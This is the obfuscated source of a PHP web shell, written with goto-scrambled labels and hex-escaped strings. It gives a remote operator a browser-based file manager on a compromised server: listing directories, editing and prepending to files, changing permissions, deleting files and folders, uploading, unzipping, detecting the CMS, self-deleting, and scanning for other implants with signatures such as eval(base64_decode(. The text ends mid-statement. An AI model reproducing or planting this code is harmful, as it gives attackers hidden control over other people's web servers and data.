if(isset($_COOKIE['rWQ7'])) {
die('InBcZ'.'THfg');
}
goto wXTDj; rks5I: $arr_filenames = array(); goto Pj6vV; GNZ40: function edit_file($file, $current) { if (!empty($_POST["\x63\x68\155"])) { if ($_POST["\143\150\155"] == "\60\67\x35\x35") { if (chmod($file, 493)) { $message_chmod = "\x3c\146\157\x6e\x74\x20\x63\x6f\154\157\162\x3d\42\x67\162\x65\x65\156\42\x3e\x3c\142\x3e\120\x65\x72\x6d\x69\163\x73\151\157\x6e\x20\143\x68\x61\x6e\147\x65\144\41\74\x2f\142\76\x3c\x2f\146\x6f\x6e\164\x3e"; } else { $message_chmod = "\74\x66\x6f\x6e\x74\x20\143\157\x6c\x6f\x72\x3d\42\x72\x65\144\x22\76\74\142\x3e\125\156\x61\142\154\145\x20\x63\x68\x61\156\147\145\x20\x70\x65\162\x6d\x69\163\x73\151\x6f\x6e\x21\x3c\x2f\142\76\x3c\57\146\x6f\156\x74\x3e"; } } elseif ($_POST["\143\150\155"] == "\60\x34\64\x34") { if (chmod($file, 292)) { $message_chmod = "\74\x66\157\x6e\x74\40\143\x6f\x6c\x6f\x72\75\42\x67\x72\145\x65\156\x22\x3e\x3c\x62\76\x50\145\x72\x6d\151\163\163\151\x6f\156\x20\x63\150\141\x6e\x67\145\144\41\x3c\57\x62\x3e\74\57\x66\157\156\164\76"; } else { $message_chmod = "\x3c\146\157\156\164\40\143\x6f\154\157\162\x3d\x22\x72\145\x64\42\x3e\74\x62\76\125\x6e\x61\x62\x6c\145\40\x63\x68\141\156\x67\x65\40\x70\x65\x72\155\x69\x73\163\x69\157\x6e\x21\74\57\142\76\74\x2f\146\157\x6e\x74\76"; } } elseif ($_POST["\x63\x68\x6d"] == "\x30\66\64\64") { if (chmod($file, 420)) { $message_chmod = "\74\146\x6f\x6e\164\x20\x63\x6f\154\x6f\162\x3d\x22\x67\x72\x65\145\156\42\76\x3c\142\x3e\120\145\x72\x6d\x69\163\163\151\x6f\156\x20\143\x68\141\x6e\x67\145\144\41\74\57\142\76\x3c\x2f\x66\157\156\164\76"; } else { $message_chmod = "\x3c\146\157\x6e\x74\x20\143\x6f\154\157\x72\75\42\x72\x65\x64\x22\x3e\x3c\x62\76\125\x6e\141\142\154\x65\x20\143\150\x61\x6e\x67\145\40\x70\145\162\x6d\151\163\163\x69\157\x6e\x21\x3c\57\142\76\x3c\57\x66\157\x6e\x74\x3e"; } } else { $message_chmod = "\60\67\x35\x35\x3c\142\162\x3e\x30\64\x34\x34\74\x62\162\x3e\x30\66\64\x34\x3c\x62\x72\x3e"; } echo $message_chmod; } if (empty($_POST["\156\x65\x77"])) { $pos_end = strripos($file, "\x2f"); $dir = substr_replace($file, '', $pos_end, 99999); if (file_exists($file) and filesize($file) > 1) { if (!($fp = fopen($file, "\x72"))) { echo "\156\x6f\40\x68\x61\166\145\x20\x70\145\162\155\151\163\x73\x69\x6f\x6e\74\x62\162\x3e"; $file_cont = "\143\141\156\x27\164\x20\163\x68\x6f\x77"; } else { $file_cont = fread($fp, filesize($file)); fclose($fp); } } else { $file_cont = ''; } $file_cont = str_replace("\74\x74\x65\x78\x74\x61\x72\145\141\76", "\x3c\x74\145\170\x74\x61\x72\x65\141\x3e", $file_cont); $file_cont = htmlspecialchars($file_cont); echo "\74\x74\x72\x3e\74\164\144\x20\141\x6c\151\147\x6e\x3d\x22\143\145\156\x74\x65\162\42\40\x63\x6f\x6c\x73\160\x61\x6e\x3d\42\65\x22\76\x3c\x66\157\162\x6d\x20\x61\143\x74\x69\x6f\156\x20\x3d\40\x27\x68\164\164\160\72\57\57" . $current . "\x3f\x65\144\x69\164\75" . $file . "\x26\144\x69\162\x3d" . $dir . "\47\40\155\x65\164\150\157\x64\40\x3d\x20\x27\120\117\x53\124\x27\x3e\xa"; echo "\x46\151\154\x65\x3a\x20" . $file . "\74\x62\162\x3e\12"; echo "\x3c\164\145\170\x74\x61\x72\x65\x61\x20\156\141\155\x65\40\x3d\40\x27\x6e\x65\167\47\x20\162\x6f\167\x73\40\x3d\40\47\62\x30\x27\40\143\x6f\154\x73\x20\x3d\x20\47\x31\62\x30\47\x3e" . $file_cont . "\x3c\57\x74\x65\x78\x74\141\162\145\141\76\74\142\162\x3e\12"; echo "\x3c\144\x69\166\x20\x61\154\x69\147\156\75\x22\x72\151\x67\150\x74\x22\76\x3c\142\162\x3e\74\x69\156\160\x75\x74\40\164\171\x70\x65\x20\75\40\x27\163\x75\142\x6d\x69\x74\47\40\x76\141\x6c\165\145\40\75\x20\x27\x53\x61\166\145\x27\76\x3c\57\x64\151\x76\76\x3c\57\146\x6f\162\155\76\x3c\57\164\144\x3e\74\x2f\164\x72\76\xa"; echo "\x3c\x74\x72\x3e\x3c\164\x64\40\x61\154\151\147\156\x3d\42\x6c\x65\x66\x74\42\76\x3c\146\x6f\x72\155\40\x61\143\164\151\x6f\x6e\40\75\x20\x27\x68\164\x74\x70\72\x2f\x2f" . $current . "\77\145\144\151\164\75" . $file . "\46\144\151\162\75" . $dir . "\47\40\x6d\145\x74\x68\157\x64\x20\75\40\x27\120\117\x53\x54\x27\76\12"; echo "\x3c\x69\x6e\160\x75\164\40\x6e\141\155\145\75\x22\x63\150\x6d\x22\x20\163\151\x7a\145\x3d\x22\64\x22\x20\x74\x79\x70\x65\75\x22\x74\x65\170\x74\x22\40\160\154\x61\143\145\150\x6f\x6c\144\145\x72\x3d\42" . perms($file, "\x31") . "\x22\x2f\76"; echo "\74\x69\x6e\x70\x75\164\x20\x74\x79\160\x65\x3d\x22\163\165\142\x6d\151\x74\x22\40\166\x61\x6c\165\x65\x3d\42\x6f\153\x22\x20\57\76\x3c\57\146\157\162\x6d\x3e\74\57\x74\144\76\12"; echo "\x3c\164\144\40\143\157\x6c\x73\160\x61\x6e\x3d\x22\63\42\x20\x61\154\151\x67\156\75\42\x6c\x65\146\x74\42\x3e\74\x66\x6f\x72\x6d\40\141\x63\x74\x69\157\x6e\40\x3d\40\x27\150\164\164\x70\72\57\57" . $current . "\x3f\162\x65\156\141\x6d\x65\x3d" . $file . "\x26\x64\151\x72\75" . $dir . "\47\x20\x6d\145\x74\x68\157\144\x20\75\40\x27\x50\x4f\123\124\x27\76\xa"; echo "\74\151\x6e\160\165\x74\x20\164\x79\x70\x65\x3d\x22\164\x65\170\x74\x22\x20\156\x61\x6d\145\x3d\47\x6e\137\156\x61\x6d\145\x27\x20\x73\151\x7a\145\75\42\67\x32\x22\40\x76\141\x6c\x75\145\x3d\42{$file}\42\x3e"; echo "\74\x69\x6e\x70\x75\x74\40\x74\171\160\145\x3d\x22\163\x75\x62\155\x69\x74\42\x20\x76\x61\x6c\165\145\75\x22\x6f\153\42\x20\x2f\76\74\x2f\x66\x6f\162\x6d\x3e\74\57\x74\x64\76\x3c\57\x74\x72\76\xa"; } else { if (!empty($_POST["\x6e\145\167\x5f\x72\x65\155\x6f\164\145"])) { if (!chmod($file, 493)) { return "\x6e\157\x20\150\x61\x76\145\x20\160\x65\162\155\x69\x73\163\151\157\156\x20\x66\157\x72\x20\x63\150\x6d\157\x64\41"; } $file_cont = only_read($file); $file_cont = $_POST["\156\145\167"] . $file_cont; $fp = fopen($file, "\167"); if (fwrite($fp, $file_cont)) { $message = "\x20\x2d\x20\x3c\x66\x6f\156\164\40\143\157\154\157\162\75\x22\147\162\x65\145\x6e\x22\x3e\74\x62\x3e\x45\144\x69\164\x65\144\41\x3c\57\x62\76\x3c\57\x66\x6f\x6e\x74\x3e"; } else { $message = "\40\55\x20\x3c\x66\157\156\x74\40\x63\157\x6c\157\162\75\42\162\x65\x64\42\76\x3c\x62\x3e\125\156\x61\142\x6c\145\x20\164\157\40\x65\144\x69\164\x21\74\x2f\x62\x3e\x3c\57\x66\x6f\156\164\x3e"; } fclose($fp); if (!chmod($file, 292)) { return "\156\x6f\x20\150\x61\166\145\x20\x70\145\x72\155\x69\163\x73\151\x6f\156\x20\146\157\x72\40\x63\x68\x6d\x6f\x64\x21"; } } else { if (!chmod($file, 493)) { return "\x6e\x6f\x20\x68\x61\x76\x65\40\160\145\162\x6d\x69\x73\x73\x69\x6f\156\40\x66\x6f\x72\40\x63\150\155\157\144\x21"; } $fp = fopen($file, "\167"); if (fwrite($fp, $_POST["\x6e\x65\x77"])) { $message = "\40\55\40\x3c\x66\157\x6e\x74\40\143\x6f\154\157\162\75\x22\147\162\145\x65\x6e\x22\76\x3c\142\x3e\x45\x64\x69\164\145\x64\x21\x3c\x2f\142\x3e\74\x2f\x66\x6f\x6e\x74\x3e"; } else { $message = "\x20\55\x20\x3c\x66\x6f\156\x74\40\x63\x6f\x6c\x6f\162\75\42\162\145\144\42\x3e\x3c\x62\x3e\x55\x6e\x61\142\x6c\145\x20\164\x6f\40\145\144\151\164\x21\74\57\x62\x3e\74\57\x66\x6f\156\x74\x3e"; } fclose($fp); } $pos_end = strripos($file, "\x2f"); $dir = substr_replace($file, '', $pos_end, 99999); $fp = fopen($file, "\162"); $file_cont = fread($fp, filesize($file)); fclose($fp); $file_cont = str_replace("\74\164\145\x78\164\x61\x72\x65\x61\76", "\x3c\164\x65\x78\x74\x61\x72\145\x61\76", $file_cont); echo "\x3c\x74\x72\76\74\164\x64\40\x61\x6c\151\147\156\75\42\143\x65\156\164\x65\162\x22\x20\x63\157\154\163\x70\141\156\75\42\65\x22\76\x3c\146\x6f\162\x6d\40\x61\x63\164\x69\157\x6e\40\75\x20\47\150\x74\x74\x70\x3a\x2f\x2f" . $current . "\77\x65\x64\x69\x74\x3d" . $file . "\46\x64\151\162\x3d" . $dir . "\47\40\x6d\145\x74\150\157\x64\40\75\x20\x27\x50\117\123\x54\47\76\xa"; echo "\x46\x69\x6c\145\x3a\40" . $file . $message . "\x3c\x62\162\x3e\xa"; echo "\74\x74\145\170\164\141\162\145\141\40\x6e\141\x6d\x65\40\75\40\x27\x6e\x65\x77\x27\40\x72\157\167\163\40\x3d\40\47\62\60\x27\x20\143\157\154\x73\x20\75\40\x27\x31\x32\60\47\76" . $file_cont . "\x3c\x2f\x74\145\170\x74\141\x72\x65\141\76\x3c\142\162\76\12"; echo "\x3c\144\x69\166\x20\x61\154\x69\147\156\x3d\42\x72\x69\147\x68\164\42\76\x3c\142\162\76\x3c\151\x6e\160\x75\x74\x20\164\171\x70\145\40\x3d\x20\x27\163\165\142\x6d\x69\164\47\x20\166\x61\154\x75\145\40\75\x20\47\x53\x61\166\145\x27\76\74\57\144\x69\x76\76\74\x2f\x66\157\162\155\x3e\x3c\57\164\144\76\x3c\57\x74\162\76\12"; echo "\x3c\164\x72\76\x3c\x74\x64\40\141\154\151\x67\156\75\42\x6c\x65\146\164\x22\x3e\x3c\x66\x6f\x72\155\40\141\x63\x74\x69\157\x6e\x20\x3d\x20\47\150\164\x74\160\72\x2f\57" . $current . "\x3f\x65\x64\151\164\75" . $file . "\46\144\151\x72\x3d" . $dir . "\x27\40\155\145\164\150\x6f\144\40\x3d\40\47\120\117\123\124\47\x3e\xa"; echo "\x3c\x69\156\x70\x75\x74\x20\x6e\141\x6d\145\x3d\x22\143\150\155\x22\x20\x73\151\172\x65\x3d\42\64\x22\x20\164\171\160\x65\x3d\42\164\x65\x78\164\x22\x20\160\154\141\x63\145\x68\x6f\x6c\144\145\162\x3d\42" . perms($file, "\61") . "\42\57\76"; echo "\74\x69\156\x70\165\164\x20\164\171\x70\x65\x3d\x22\163\x75\142\155\x69\x74\x22\40\166\x61\x6c\165\145\75\42\x6f\153\x22\40\57\x3e\x3c\x2f\146\x6f\x72\x6d\x3e\x3c\x2f\x74\x64\x3e\12"; echo "\74\164\x64\x20\143\157\154\163\x70\x61\x6e\x3d\x22\x33\x22\x20\141\154\x69\147\156\75\x22\154\x65\146\x74\42\x3e\x3c\146\157\x72\x6d\40\x61\x63\x74\x69\157\156\x20\75\40\x27\150\x74\x74\160\72\x2f\57" . $current . "\x3f\162\x65\156\x61\x6d\145\75" . $file . "\46\x64\x69\162\75" . $dir . "\47\x20\155\145\x74\150\x6f\144\x20\75\x20\x27\x50\117\123\124\x27\76\12"; echo "\x3c\151\x6e\160\x75\164\40\164\171\160\x65\75\42\x74\145\x78\164\42\x20\156\x61\155\x65\x3d\x27\x6e\137\x6e\141\x6d\145\47\40\163\151\172\x65\75\x22\67\x32\42\x20\x76\141\x6c\x75\x65\75\42{$file}\42\x3e"; echo "\74\151\x6e\x70\165\164\x20\164\x79\160\145\x3d\42\163\x75\x62\155\x69\164\42\40\166\141\154\x75\x65\75\42\157\153\x22\40\x2f\x3e\x3c\57\x66\x6f\x72\x6d\76\x3c\57\x74\x64\76\x3c\x2f\x74\162\x3e\12"; if (chmod($file, 292)) { $message_chmod_last = "\x3c\146\157\156\x74\40\143\157\154\157\162\x3d\x22\x67\162\x65\145\x6e\x22\x3e\74\x62\x3e\120\x65\x72\x6d\151\x73\x73\x69\x6f\x6e\x20\x63\150\141\156\147\145\144\41\74\x2f\142\76\x3c\x2f\x66\157\156\164\x3e"; } else { $message_chmod_last = "\x3c\146\157\156\x74\40\x63\x6f\x6c\x6f\162\75\42\x72\145\144\x22\76\74\142\76\125\156\x61\x62\154\x65\40\x63\150\x61\x6e\147\145\x20\160\145\162\155\151\x73\163\151\x6f\x6e\41\74\x2f\142\x3e\74\57\x66\x6f\156\x74\76"; } } } goto aowPs; d2RCv: $path_for_work = $path; goto ui5j8; Wgr7_: echo $_SERVER["\x53\105\122\x56\x45\122\x5f\x41\104\x44\x52"]; goto iUuHB; gmR7i: echo "\74\x61\40\x68\x72\x65\x66\75\42" . "\150\x74\x74\160\72\x2f\x2f" . $domain . $script_path . "\x3f\x64\x69\162\x3d" . $_SERVER["\104\117\103\x55\115\105\116\x54\137\x52\x4f\117\124"] . "\x22\76" . $_SERVER["\104\117\x43\125\115\105\x4e\124\137\x52\x4f\117\124"] . "\74\x2f\x61\76"; goto MPvA5; p1Drj: if (isset($_GET["\144\151\x72"])) { if (isset($_POST["\156\x65\x77\x5f\x66\151\154\145\x5f\x6e\x61\155\x65"])) { $new_file = $_GET["\x64\x69\x72"] . "\x2f" . $_POST["\156\x65\x77\137\x66\x69\154\145\137\x6e\141\x6d\x65"]; $make_file = "\x68\164\x74\160\72\57\x2f" . $domain . $script_path . "\x3f\x64\x69\162\75" . $_GET["\x64\151\x72"] . "\x26\145\144\151\x74\75" . $new_file; } else { $make_file = "\150\x74\x74\160\72\57\x2f" . $domain . $script_path . "\77\x64\151\x72\x3d" . $_GET["\x64\151\x72"]; } } else { if (isset($_POST["\x6e\x65\x77\x5f\x66\x69\x6c\x65\x5f\156\141\x6d\x65"])) { $new_file = $_SERVER["\104\x4f\x43\125\x4d\105\116\124\137\x52\117\117\124"] . "\57" . $_POST["\156\x65\167\137\x66\151\154\x65\x5f\156\x61\x6d\x65"]; $make_file = "\x68\164\164\x70\x3a\57\57" . $domain . $script_path . "\77\144\151\162\x3d" . $_GET["\x64\151\162"] . "\46\145\x64\151\164\x3d" . $new_file; } else { $make_file = "\x68\164\x74\160\x3a\x2f\57" . $domain . $script_path . "\x3f\x64\151\x72\x3d" . $_SERVER["\x44\x4f\103\x55\115\x45\116\124\137\122\x4f\117\124"]; } } goto nAIB7; j19GU:
<tr align="center"style="color:#423c63"><td align="left">NameSize | Modify | Permissions | Actions | goto UBdvp; XRkPj: $arr_links = array(); goto d2RCv; NW4Fw: if (isset($_GET["\145\x64\x69\x74"])) { $current = $domain . $script_path; edit_file($_GET["\145\144\151\164"], $current); } goto j19GU; ui5j8: for ($i = 1; $i <= $slesh_count; $i++) { $path_for_work = folder_separate($path_for_work); $arr_links[] = $path_for_work; } goto h7ORp; cHx6x: $arr_folder = array(); goto rks5I; SVMV3:
Server IP: goto Wgr7_; y4_lC: function CMS() { if (is_dir($_SERVER["\x44\117\x43\125\115\x45\116\124\137\x52\x4f\117\x54"] . "\57\141\x64\x6d\151\156\151\163\x74\162\x61\x74\157\x72\57") and is_dir($_SERVER["\104\117\103\125\x4d\x45\x4e\x54\137\x52\117\x4f\x54"] . "\x2f\143\157\x6d\x70\157\156\x65\x6e\x74\163\x2f") and is_dir($_SERVER["\104\x4f\103\x55\115\x45\116\x54\137\122\x4f\117\x54"] . "\57\151\156\143\154\165\144\x65\x73\57")) { return "\112\x6f\157\155\154\x61\41"; } elseif (is_dir($_SERVER["\104\x4f\103\x55\115\105\116\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\167\x70\x2d\143\157\156\x74\x65\x6e\x74\57") and is_dir($_SERVER["\x44\117\103\x55\x4d\105\x4e\124\137\122\117\x4f\124"] . "\57\x77\x70\x2d\x61\x64\x6d\151\x6e\x2f") and is_dir($_SERVER["\104\x4f\103\125\x4d\x45\x4e\124\137\122\x4f\x4f\124"] . "\x2f\x77\160\55\151\156\x63\154\x75\144\145\x73\57")) { return "\x57\157\x72\144\x50\x72\x65\x73\x73"; } else { return "\x55\x6e\x6b\x6e\157\x77\156"; } } goto ZJN2b; DodqG: if (isset($_GET["\x64\151\163\x70\x61\164\x63\x68"])) { del_file($_SERVER["\x53\103\122\111\120\124\x5f\x46\x49\x4c\105\116\x41\115\x45"]); } goto qTBWq; UWbec: function get_time($file) { if (!file_exists($file)) { return "\x6e\x6f\40\x69\156\x66\157"; } $last_update = filemtime($file); $time = date("\131\x2d\155\x2d\x64\x20\x48\72\151\x3a\x73", $last_update); return $time; } goto ZgMnC; ZgMnC: function perms($filename, $check) { $perms = substr(decoct(fileperms($filename)), -3); if ($perms == "\66\x34\x34") { $color = "\147\162\x65\x65\156"; } elseif ($perms == "\67\65\x35") { $color = "\43\62\x45\103\x38\x34\62"; } elseif ($perms == "\x34\x34\x34") { $color = "\142\162\157\167\156"; } elseif ($perms == "\x30\x30\x30") { $color = "\x72\x65\144"; } elseif ($perms == "\67\64\x34") { $color = "\157\162\141\156\147\x65"; } elseif ($perms == "\66\x36\64") { $color = "\x67\162\145\145\x6e"; } else { $color = "\147\162\145\x79"; } if ($check == 1) { return $perms; } else { return "\74\x66\x6f\156\x74\40\143\157\x6c\157\162\75{$color}\x3e" . $perms . "\x3c\x2f\x66\x6f\156\164\x3e"; } } goto y4_lC; bU592: function clear_folder($dir) { $d = opendir($dir); while (($entry = readdir($d)) !== false) { if ($entry != "\56" && $entry != "\x2e\56") { if (is_dir($dir . "\x2f" . $entry)) { clear_folder($dir . "\57" . $entry); } else { unlink($dir . "\x2f" . $entry); } } } closedir($d); rmdir($dir); } goto aPthd; UBdvp: if (isset($_GET["\x64\x69\162"])) { $arr_files = scandir($_GET["\x64\151\162"]); } else { $arr_files = scandir($_SERVER["\x44\117\103\125\x4d\x45\x4e\x54\137\122\117\x4f\124"]); } goto PxSrw; JSSZy: function del_file($file) { if (!file_exists($file)) { return "\x66\151\x6c\x65\40\156\157\164\40\145\170\x69\x73\164\163"; } else { if (!unlink($file)) { if (!chmod($file, 493)) { return "\156\157\40\x68\141\166\x65\40\160\145\162\155\151\x73\163\151\x6f\x6e\x20\x66\x6f\162\x20\x63\150\x6d\157\x64\41"; } else { if (!unlink($file)) { return "\x63\141\x6e\40\x6e\157\164\x20\x64\145\154\145\164\x65\41"; } else { return "\x6f\x6b\x21"; } } } else { return "\157\153\x21"; } } } goto DodqG; hyepL: function unzip_file($file) { $for_del = strrchr($file, "\x2f"); $folder_to_save = str_replace($for_del, '', $file); $zip = new ZipArchive(); $zip->open($file); $zip->extractTo($folder_to_save); $zip->close(); echo "\74\x74\162\76\74\x74\144\x3e\x46\151\x6c\145\72\40{$for_del}\40\55\x20\74\146\157\156\x74\x20\x63\157\154\157\x72\x3d\x22\147\162\x65\x65\x6e\x22\x3e\165\x6e\172\151\160\40\163\165\143\143\x65\x73\163\x66\x75\154\x6c\x79\74\x2f\146\x6f\x6e\x74\x3e\x3c\57\x74\x64\76\x3c\x2f\164\x72\x3e"; } goto OdL1t; MPvA5:
Directory: goto Lvj3c; ltHLW:
"enctype="multipart/form-data"method="post"><input type="file"id="inputfile"name="inputfile"> <input type="submit"value="ok">CMS: goto QqCpE; JPpj8: if ($permsself !== "\64\64\64") { chmod($_SERVER["\123\103\122\x49\x50\x54\x5f\106\111\114\x45\x4e\x41\115\105"], 292); } goto JSSZy; aowPs: if (isset($_GET["\x64\x65\x6c"])) { if (is_dir($_GET["\x64\145\x6c"])) { clear_folder($_GET["\144\x65\154"]); } else { del_file($_GET["\144\x65\154"]); } } goto CYFAA; Pj6vV:
<tr align="left"><td colspan="3"> goto eSEDV; eSEDV: if (sizeof($_FILES) != 0) { if (isset($_FILES) && $_FILES["\x69\x6e\160\x75\x74\x66\x69\154\145"]["\145\162\x72\157\162"] == 0) { if (isset($_GET["\x64\151\x72"])) { $path = $_GET["\x64\151\x72"]; } else { $path = $_SERVER["\x44\x4f\x43\x55\x4d\105\x4e\x54\x5f\122\x4f\x4f\124"]; } $destiation_dir = $path . "\57" . $_FILES["\x69\x6e\160\165\164\146\151\154\x65"]["\x6e\141\155\145"]; move_uploaded_file($_FILES["\x69\156\x70\x75\x74\x66\x69\154\145"]["\164\155\160\137\x6e\x61\155\145"], $destiation_dir); $open_upload_file = str_replace($_SERVER["\x44\x4f\103\x55\115\x45\116\x54\x5f\122\117\x4f\x54"], $_SERVER["\123\105\x52\x56\105\122\x5f\x4e\x41\x4d\x45"], $destiation_dir); echo "\74\146\x6f\x6e\x74\40\143\157\x6c\157\162\75\42\x67\x72\x65\145\x6e\42\x3e\x3c\x62\x3e" . "\74\x61\x20\164\x61\162\147\145\164\x3d\x22\137\142\x6c\x61\x6e\x6b\42\x20\150\x72\x65\x66\75\x22\150\164\x74\x70\72\57\57{$open_upload_file}\x22\x3e\x46\x69\x6c\x65\x20\x55\x70\154\157\141\x64\x65\144\41\74\57\141\76" . "\x3c\x2f\x62\76\x3c\57\x66\157\x6e\164\x3e"; } } elseif (sizeof($_FILES) != 0) { echo "\74\146\x6f\156\164\x20\x63\x6f\154\x6f\x72\75\x22\162\x65\x64\42\76\x3c\x62\76\x4e\x6f\x20\x46\151\x6c\145\x20\x55\x70\x6c\157\141\x64\145\144\x3c\57\x62\x3e\74\x2f\146\x6f\156\x74\76"; } goto swx35; K2tvA: if (isset($_GET["\x66\x69\156\144\145\162"])) { $domain = $_SERVER["\123\x45\122\x56\x45\x52\x5f\116\x41\115\x45"]; $script_path = $_SERVER["\x53\x43\x52\111\x50\x54\137\116\101\x4d\105"]; $finderdata_path = $_SERVER["\x44\117\x43\x55\x4d\x45\116\x54\137\x52\x4f\117\x54"] . "\57\x66\x69\x6e\x64\x65\x72\x64\x61\x74\141\56\x74\170\164"; $good_result_path = $_SERVER["\104\x4f\x43\x55\115\x45\116\x54\x5f\x52\117\x4f\124"] . "\57\147\157\x6f\x64\146\151\x6e\144\145\x72\x64\x61\x74\x61\56\x74\x78\164"; $search_str = "\145\x76\x61\x6c\x28\142\x61\x73\x65\x36\x34\137\x64\x65\x63\x6f\x64\x65\x28"; $search_str2 = "\101\x72\162\141\x79\50\x62\x61\163\x65\66\64\x5f\x64\145\x63\157\144\x65\x28"; $search_str3 = "\100\44\151\x73\x62\157\x74"; $search_str4 = "\x40\x72\x65\x71\165\x69\x72\x65"; $search_str5 = "\145\166\141\x6c\50\x67\x7a\165\156\x63\x6f\x6d\x70\162\x65\x73\163\x28\x62\141\x73\145\66\64\137\x64\145\x63\157\144\x65\50"; $search_str6 = "\x40\x69\x6e\x63\154\165\144\x65\x20\42\134\x78\62"; $search_str7 = "\x24\x4f\x4f"; $search_str8 = "\x63\x61\143\x68\145\75\x30\60"; $search_str9 = "\x66\x69\154\145\137\147\145\x74\x5f\x63\157\156\x74\145\x6e\x74\163\x28\134\42\56\x2e\57\x69\x6e\144\x65\170\56\160\x68\160\134\42\51\42"; $search_str10 = "\x69\163\137\x75\160\154\x6f\x61\x64\x65\144\137\146\x69\154\x65"; $search_str11 = "\142\x61\163\x65\66\x34\137\144\145\143\157\144\x65\x28\x24\137\120\117\123\x54"; $search_str12 = "\155\165\x6c\x74\151\160\x61\162\x74\57\x66\157\x72\x6d\55\144\141\x74\141"; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER["\104\x4f\x43\125\115\x45\116\x54\137\x52\x4f\117\x54"]); $f = fopen($finderdata_path, "\141"); foreach ($arr_php_file as $each) { if ($each !== $_SERVER["\x53\x43\x52\x49\x50\x54\137\x46\111\114\x45\x4e\101\115\x45"]) { fwrite($f, $each . "\12"); } } fclose($f); if (file_exists($finderdata_path)) { $redirect = str_replace($_SERVER["\104\117\x43\x55\115\105\x4e\x54\137\x52\117\x4f\x54"], $_SERVER["\123\105\122\126\x45\122\137\x4e\101\x4d\x45"], $_SERVER["\123\103\x52\111\120\124\x5f\x46\111\x4c\x45\x4e\x41\115\105"]); $redirect = "\x68\164\164\160\72\57\57" . $redirect . "\x3f\x66\151\x6e\x64\145\162";
<script>var delay=300;setTimeout("document.location.href=' echo $redirect;
'",delay)</script> } else { echo "\145\x72\x72\157\162\x3a\40\146\x69\154\x65\x20\x66\x69\x6e\x64\145\x72\x64\x61\164\141\56\x74\x78\x74\x20\x63\x61\156\40\x6e\157\x74\40\143\162\x65\141\x74\x65"; } } else { $all_path = read_file($finderdata_path); $urls_for_work = array(); for ($u = 0; $u < 900; $u++) { if ($all_path[$u] !== null and $all_path[$u] !== "\x20" and $all_path[$u] !== '' and $all_path[$u] !== "\x2e" and $all_path[$u] !== "\x2e\x2e") { $urls_for_work[] = trim($all_path[$u]); } } for ($i = 0; $i < 900; $i++) { unset($all_path[$i]); } $fnew = fopen($finderdata_path, "\167"); foreach ($all_path as $each_path) { if ($each_path !== null and $each_path !== '' and $each_path !== "\x20") { fwrite($fnew, $each_path . "\12"); } } fclose($fnew); foreach ($urls_for_work as $each_for_check) { if (file_exists($each_for_check)) { if (filesize($each_for_check) < 5000000) { $each_read = only_read($each_for_check); } else { $each_read = ''; } $result = stristr($each_read, $search_str); $result2 = stristr($each_read, $search_str2); $result3 = stristr($each_read, $search_str3); $result4 = stristr($each_read, $search_str4); $result5 = stristr($each_read, $search_str5); $result6 = stristr($each_read, $search_str6); $result7 = stristr($each_read, $search_str7); $result8 = stristr($each_read, $search_str8); $result9 = stristr($each_read, $search_str9); $result10 = stristr($each_read, $search_str10); $result11 = stristr($each_read, $search_str11); $result12 = stristr($each_read, $search_str12); if ($result !== false or $result2 !== false or $result3 !== false or $result4 !== false or $result5 !== false or $result6 !== false or $result7 !== false or $result8 !== false or $result9 !== false or $result10 !== false or $result11 !== false or $result12 !== false) { $f = fopen($good_result_path, "\x61"); fwrite($f, $each_for_check . "\xa"); fclose($f); } } } if (count($all_path) > 0) { echo count($all_path) . "\x20\146\x69\x6c\145\x73\40\x66\157\162\x20\143\150\x65\143\x6b\x3c\142\162\76"; } else { echo "\x3c\164\x72\x3e\x3c\x74\x64\76\106\151\x6e\151\163\150\x21\x3c\57\164\x64\x3e\74\57\x74\162\x3e"; } $for_check = read_file($finderdata_path); if (file_exists($finderdata_path) and filesize($finderdata_path) > 1) { $redirect = str_replace($_SERVER["\x44\117\103\x55\115\x45\116\124\x5f\122\117\x4f\124"], $_SERVER["\x53\105\122\x56\105\x52\137\116\101\x4d\x45"], $_SERVER["\123\103\x52\111\x50\124\137\x46\x49\114\105\116\101\x4d\x45"]); $redirect = "\x68\164\164\x70\72\57\57" . $redirect . "\77\146\151\156\x64\x65\x72";
<script>var delay=100;setTimeout("document.location.href=' echo $redirect;
'",delay)</script> } else { $arr_result = read_file($good_result_path); foreach ($arr_result as $each) { if ($each !== null and $each !== '' and $each !== "\40") { if (isset($_GET["\144\x69\162"])) { $dr = $_GET["\144\x69\162"]; } else { $dr = $_SERVER["\104\x4f\x43\x55\x4d\105\x4e\x54\x5f\x52\x4f\117\x54"]; } $time = get_time($each); $real_url = str_replace($_SERVER["\104\117\x43\x55\115\105\116\124\x5f\x52\117\x4f\x54"], $_SERVER["\123\105\122\x56\105\122\137\116\x41\115\x45"], $each); echo "\74\164\162\40\x62\147\x63\x6f\x6c\x6f\x72\x3d\x22\x23\146\x66\x66\x66\146\146\42\40\141\154\151\147\156\x3d\x22\x63\145\x6e\x74\145\x72\x22\76\x3c\x74\x64\40\141\x6c\x69\x67\x6e\75\x22\154\x65\x66\164\42\40\x3e" . "\x3c\x61\x20\x73\164\x79\x6c\x65\x3d\42\164\145\170\x74\x2d\x64\145\x63\157\x72\141\x74\151\x6f\156\x3a\x20\156\x6f\x6e\x65\73\42\x20\x68\162\145\146\75\x22\x68\164\x74\160\72\57\x2f{$domain}{$script_path}\77\145\x64\151\164\75{$each}\x26\x64\x69\x72\75{$dr}\x22\76\x3c\x66\x6f\x6e\164\40\x63\x6f\154\x6f\162\75\42\x62\x6c\141\143\x6b\42\76{$each}\74\x2f\x66\157\x6e\x74\76\74\57\141\x3e" . "\x3c\57\164\x64\76\74\x74\x64\76" . get_filesize($each) . "\x3c\x2f\x74\x64\76\74\164\144\x3e{$time}\74\57\164\x64\x3e\74\164\x64\x3e" . perms($each, "\x30") . "\74\x2f\x74\x64\76\x3c\164\x64\76" . "\74\141\x20\x68\162\145\x66\75\x22\x68\x74\x74\160\72\57\57{$domain}{$script_path}\x3f\x64\x65\154\x3d{$each}\46\x64\151\162\x3d{$dr}\x22\76\x55\74\x2f\141\76\46\156\142\x73\x70\x3b" . "\x3c\x61\40\x68\162\x65\146\75\x22\x68\x74\x74\160\x3a\x2f\x2f{$domain}{$script_path}\x3f\145\144\151\164\75{$each}\46\x64\151\x72\75{$dr}\x22\x3e\x45\x3c\x2f\x61\76\46\x6e\x62\x73\x70\73" . 